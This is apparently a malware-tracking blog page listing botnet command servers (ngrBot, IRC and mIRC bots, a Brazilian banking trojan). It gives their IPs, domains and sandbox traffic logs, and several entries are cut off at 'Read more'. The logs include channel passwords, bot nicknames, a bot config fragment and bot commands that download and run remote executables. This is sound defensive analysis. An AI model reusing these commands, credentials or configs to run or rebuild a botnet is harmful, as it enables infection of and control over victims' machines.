This malware spread through email,exe infection,injects into explorer.exe,downloads other malwares and is controled through http sec.ka3ek2.com DNS_TYPE_A 31.44.184.232 Infected SMTP Servers used from this malware for spaming Resolved : [mx3.hotmail.com] To [65.54.188.72] Resolved : [mx3.hotmail.com] To [65.54.188.94] Resolved : [mx3.hotmail.com] To [65.55.92.152] Resolved : [mx3.hotmail.com] To [65.55.37.120] Resolved : [mx3.hotmail.com] To [65.55.37.104] Resolved : [mx3.hotmail.com]Read more...
67.222.146.210(ngrBot hosted in United States Dfw Datacenter)
Remote Host Port Number 199.15.234.7 80 67.222.146.210 6060 PASS saher NICK n{US|XPa}exohsgb USER exohsgb 0 0 :exohsgb JOIN #ksa ksa1 hosting infos: http://whois.domaintools.com/67.222.146.210
mooo.com(ngrBot hosted in Ukraine Poltava Tehnologii Budushego Llc)
Domain names used to control the botnet: hdp.zapto.org 46.166.141.149 active 1n1.sytes.net 213.155.7.39 active hdp.zapto.org not active hgjma1.biz not active jma1.biz not active mooo.com 72.8.150.1 active n1.mooo.com 86.35.19.116 active fhdp.zapto.org Remote Host Port Number 199.15.234.7 80 50.22.107.93 80 213.155.7.39 2009 PASS ngr NICK n{US|XPa}dcbcoox USER dcbcoox 0 0 :dcbcoox JOIN #juaz ngrBot PRIVMSG #juaz :[d=”http://creatucurso.net/facu/mx.exe” s=”198683Read more...
216.246.78.247(irc bot hosted in United States New York Hostforweb Inc)
Remote Host Port Number 216.246.78.247 2345 NICK New[USA|00|P|75060] PRIVMSG #!loco! :[M]: Thread Disabled. PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email. USER XP-9002 * 0 :COMPUTERNAME MODE New[USA|00|P|75060] -ix JOIN #!loco! PONG 22 MOTD hosting infos: http://whois.domaintools.com/216.246.78.247
tool.manitam.com(mIRC bots hosted in United Kingdom Redstation Limited)
tool.manitam.com 176.227.199.27 dslb-088-065-091-000.pools.arcor-ip.net 88.65.91.0 Opened listening TCP connection on port: 113 Opened listening TCP connection on port: 113 Opened listening TCP connection on port: 113 C&C Server: 176.227.199.27:6669 Server Password: Username: m0x Nickname: [x0x]XP92288 Channel: #d0x (Password: ) Channeltopic: Bot Config: On *:start: { .Nickler .server tool.manitam.com 6669 .timer 0 0 BoTNeT .dll dmu.dll HideMircRead more...
mysticalisboss.info(2k ngrBots hosted in Netherlands Amsterdam Ecatel Ltd)
The noob behind this net is a very big hf hecker named Mystical Remote Host Port Number 199.15.234.7 80 80.82.66.220 6667 Local users: Current Local Users: 1199 Max: 2019 Global users: Current Global Users: 1199 Max: 2019 PONG :B070CCDD JOIN #Techno PONG :Unreal.ircd NICK n{US|XP-32a}ffmidty USER ffmidty 0 * :ffmidty Other channels: #gBot 8 [+sntu]Read more...
pandafix.com.br(Banking Trojan hosted in Brazil Caxias Do Sul Comite Gestor Da Internet No Brasil)
This malware injects to notepad.exe notepad.exe – Network Activity – DNS Queries: dl.dropbox.com DNS_TYPE_A 50.16.240.166 107.20.132.92 107.20.134.231 107.20.135.122 107.20.207.68 174.129.232.94 184.73.245.80 23.21.195.136 www.comeciosilvaa.com.br DNS_TYPE_A 200.98.197.80 YES udp www.pandafix.com.br DNS_TYPE_A 187.17.98.44 YES udp – HTTP Conversations: 50.16.240.166:80 – [dl.dropbox.com] Request: GET /u/56787160/index.html Response: 200 “OK” 200.98.197.80:80 – [www.comeciosilvaa.com.br] Request: POST /avisosgordim/index.php Response: 404 “Not Found” 187.17.98.44:80Read more...
199.19.105.67(ngrBot hosted in United States Clarks Summit Volumedrive)
Remote Host Port Number 199.15.234.7 80 200.121.52.63 80 199.19.105.67 1085 PASS mypass NICK n{US|XPa}wwphlrx USER wwphlrx 0 0 :wwphlrx JOIN #boss secret PRIVMSG #boss :[DNS]: Blocked 0 domain(s) – Redirected 6 domain(s) [#boss] [ Topic: !up http://www.bairesac.com/exploradore.exe 190416f04cfb5877642f69b8f59708dd ] hosting infos: http://whois.domaintools.com/199.19.105.67
46.166.140.140(ngrBot hosted in United States Amsterdam Santrex Internet Services Ltd)
Remote Host Port Number 199.15.234.7 80 46.166.140.140 6667 PASS secret Clients: I have 111 clients and 0 servers Local users: Current Local Users: 111 Max: 205 Global users: Current Global Users: 111 Max: 205 NICK n{US|XPa}mthtknh USER mthtknh 0 0 :mthtknh JOIN #bone peruch Now talking in #bone Joins: {ESP|XPa}tyxdvpo [tyxdvpo@594ABF0E.765DC855.6CB32CB6.IP] Joins: {PE|W7u}ldbnzwu 12[15ldbnzwu@22B3CEAE.9F16B729.F84BD3C2.IP] hostingRead more...
108.163.164.154 (irc botnet hosted in Canada Verdun Iweb Technologies Inc)
Remote Host Port Number 108.163.164.154 1863 MODE {XPUSA706826} -ix PRIVMSG #per1 : 14,1. 15:: 11iMBot 9[Actualizacion] Iniciando descarga: 63.5KB a: C:DOCUME~1UserNameLOCALS~1Temperaseme_02130.exe @ 31.8KB/sec. QUIT 3,1 Actualizando al nuevo binario NICK {XPUSA48968} USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA48968} -ix JOIN #per JOIN #per1 hosting infos: http://whois.domaintools.com/108.163.164.154